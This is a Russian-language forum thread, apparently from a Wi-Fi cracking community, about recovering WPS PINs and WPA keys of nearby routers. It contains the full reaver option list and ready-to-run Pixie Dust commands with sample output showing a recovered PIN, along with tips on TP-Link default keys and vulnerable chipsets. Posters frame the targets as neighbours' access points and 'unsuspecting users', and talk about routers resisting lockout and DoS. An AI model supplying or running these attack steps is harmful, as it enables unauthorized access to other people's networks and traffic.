Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?
Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))
Посмотрите статистику по tp-link в ветке перебора и на 3wifiчаще всего пароль 8 цифр. А на 3wifi можно увидеть что key=wps pin)))
кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?
странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали, TL-WR740N точно не уязвим,хотя может кто то и пробовал....
а ты столбик WPS посмотри я не вижу что он подвержен какай либо атаке из имеющейся, или просто неизвестно в описании говорится что список неполный
Захватывайте хозяина точки. Принуждайте его силой мысли залогиниться в админке. И перехватывайте пароль к ней.
скажите,кто какие флаги вообще ставит в pixie wps dust?ну я имею ввиду,какие обязательно лучше поставить,а то их вон дофига: Обязательныеаргументы: -i,--interface=<wlan>Имясетевогоинтерфейсадляиспользования -b,--bssid=<mac> BSSIDточкидоступа Опциональныеаргументы: -m,--mac=<mac> MACхостовойсистемы -e,--essid=<ssid>ESSIDцелевойТД -c,--channel=<channel> Установитьканал802.11дляинтерфейса(подразумевает-f) -o,--out-file=<file> Установитьвыводвлог-файл[stdout] -s,--session=<file>Восстановитьфайлпредыдущейсессии -C,--exec=<command>Выполнитьданнуюкомандупослеуспешногоподборапина -D,--daemonize Переводreaverврежимдемона -a,--autoАвтоматическиопределитьлучшиепродвинутыеопциидляцелевойТД -f,--fixed Отключитьпрыганиепоканалам -5,--5ghzИспользоватьканалы5GHz802.11 -v,--verbose Отображатьнекритическиепредупреждения(-vvчтобыувидетьбольше) -q,--quiet Отображатьтолькокритическиепредупреждения -K--pixie-dust=<номер> [1]ЗапускаетpixiewpsсPKE,PKR,E-Hash1,E-Hash2,E-NonceиAuthkey(Ralink,Broadcom,Realtek) -Z,--no-auto-passНЕзапускатьreaverдляавтоматическогополученияпароляWPA,еслиатакаpixiewpsпрошлауспешно -h,--helpПоказатьсправку Продвинутыеопции: -p,--pin=<wps pin> Использоватьзаданный4или8цифровойWPSпин -d,--delay=<секунды> Установитьзадержкумеждупопыткамипина[1] -l,--lock-delay=<seconds>Установитьвремяожидания,еслиТДзаблокировалапопыткиводапина[60] -g,--max-attempts=<номер>Выйтипослечислапопытокпина -x,--fail-wait=<секунды> Установитьвремядляпаузыпосле10неожиданныхнеудач[0] -r,--recurring-delay=<x:y> Делатьпаузунаyсекундкаждыеxпопытокпина -t,--timeout=<секунды> Установитьпиреодтаймаутаполучения[5] -T,--m57-timeout=<секунды> УстановитьпериодтаймаутаM5/M7[0.20] -A,--no-associateНесвязыватьсясТД(связьдолжнабытьсделанадругимприложением) -N,--no-nacksНеотправлятьсообщенияNACKкогдаполученыпакетыонеисправности -S,--dh-smallИспользоватьмалыеDHключидляускоренияскоростивзлома -L,--ignore-locksИгнорироватьзаблокированныесостояния,полученныеотцелевойТД -E,--eap-terminate ЗавершатькаждуюсессиюWPSпакетомEAP FAIL -n,--nackЦелеваяТДвсегдашлётпакетыNACK[Auto] -w,--win7МимикрироватьподWindows7registrar[False] -X,--exhaustiveУстановитьисчерпывающийрежимсначаласессии[False] -1,--p1-indexУстановитьначальныйиндексмассивадляпервойполовиныпина[False] -2,--p2-indexУстановитьначальныйиндексмассивадлявторойполовиныпина[False] -P,--pixiedust-loopУстановкаврежимPixieLoop(неотправляетM4иделаетпетлюнаM3)[False] -W,--generate-pinГенерациядефолтныхпиновоткомандыdevttys0[1]Belkin[2]D-Link -H,--pixiedust-log ВключитьлогированиепоследовательностейзавершённыхPixieHashes Ну вот и какую команду,с каким набором флагов поставить? Интересна опция -Н( Опция -H // —pixiedust-log в reaver Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P. Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x <имя_файла>). И тут возникает вопрос,а как сделать эти готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x <имя_файла>).Т.е как выполнить эти полные команды,как закинуть файл в шелл и выполнить?Так как интересная вещь,насобирал штук 10 разных,не одинаковых хешей,потом по одному выполнить и мало ли,из 10 хешей и пин может найтись!Короче вопрос,как выполнить эти команды,как эти файлы в шелл закинуть и выполнить?Кто то уже так пробовал?
reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1 Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.
Что касается параметра -H: Spoiler: Собираем данные Code: tuser@linux:~$ reaver -i wlan0mon -vvv -P -H -K 1 -b 00:00:00:00:00:00 -c 1 Reaver v1.5.3 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft ... [*] Saving collected data in: 000000000000.pixie ... Spoiler: Выполняем файл с полученными данными Code: tuser@linux:~$ chmod a+x 000000000000.pixie tuser@linux:~$ ./000000000000.pixie Pixiewps 1.2 [*] Mode: 1 (RT/MT) [*] PSK1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [*] PSK2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [+] WPS pin: 00000000 [*] Time taken: 0 s 35 ms Как-то так.
она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....
Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).
везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....